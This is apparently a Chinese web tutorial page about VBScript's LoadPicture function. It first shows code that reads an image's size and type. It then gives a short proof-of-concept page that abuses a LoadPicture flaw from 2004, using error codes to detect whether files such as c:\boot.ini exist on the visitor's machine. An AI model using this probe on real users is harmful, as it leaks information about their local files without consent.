服务器之家 > 正文
示例:
<title>LoadPicture函数</title> <form name="frm"> 选择<a href='http://www.zzvips.com/qq/tp/' target='_blank'><u>图片</u></a><input type="file" name="pic" onChange="GetPicInfor()" > </form> <script language="vbscript"> Sub GetPicInfor() dim objpic,iWidth,iHeight dim pictype,picpath picpath=document.frm.pic.value set objpic=Loadpicture(picpath) iWidth = round(objpic.width / 26.4583) '26.4583是像素值 iHeight = round(objpic.height / 26.4583) select case objpic.type case 0 pictype = "None" case 1 pictype = "Bitmap" case 2 pictype = "Metafile" case 3 pictype = "Icon" case 4 pictype = "Win32-enhanced metafile" end select document.write "你选择了图片"&picpath document.write "<li>长度:"&iHeight&"</li>" document.write "<li>宽度:"&iwidth&"</li>" document.write "<li>类型:"&pictype&"</li>" End Sub </script>
不过这个函数有个漏洞,可以探测电脑上存在的文件名。2004年的漏洞,微软现在也没补,示例:
<form onsubmit="doIt(this);return false"> <input name="filename" value="c:\boot.ini" size="80" type="text"><input type="submit"> </form> <script language="vbscript"> Sub loadIt(filename) LoadPicture(filename) End Sub </script> <script language="javascript"> function doIt(form) { try { loadIt(form.filename.value); } catch(e) { result = e.number; } if (result != -2146827856) { alert('file exists'); } else { alert('file does not exist'); } } </script>
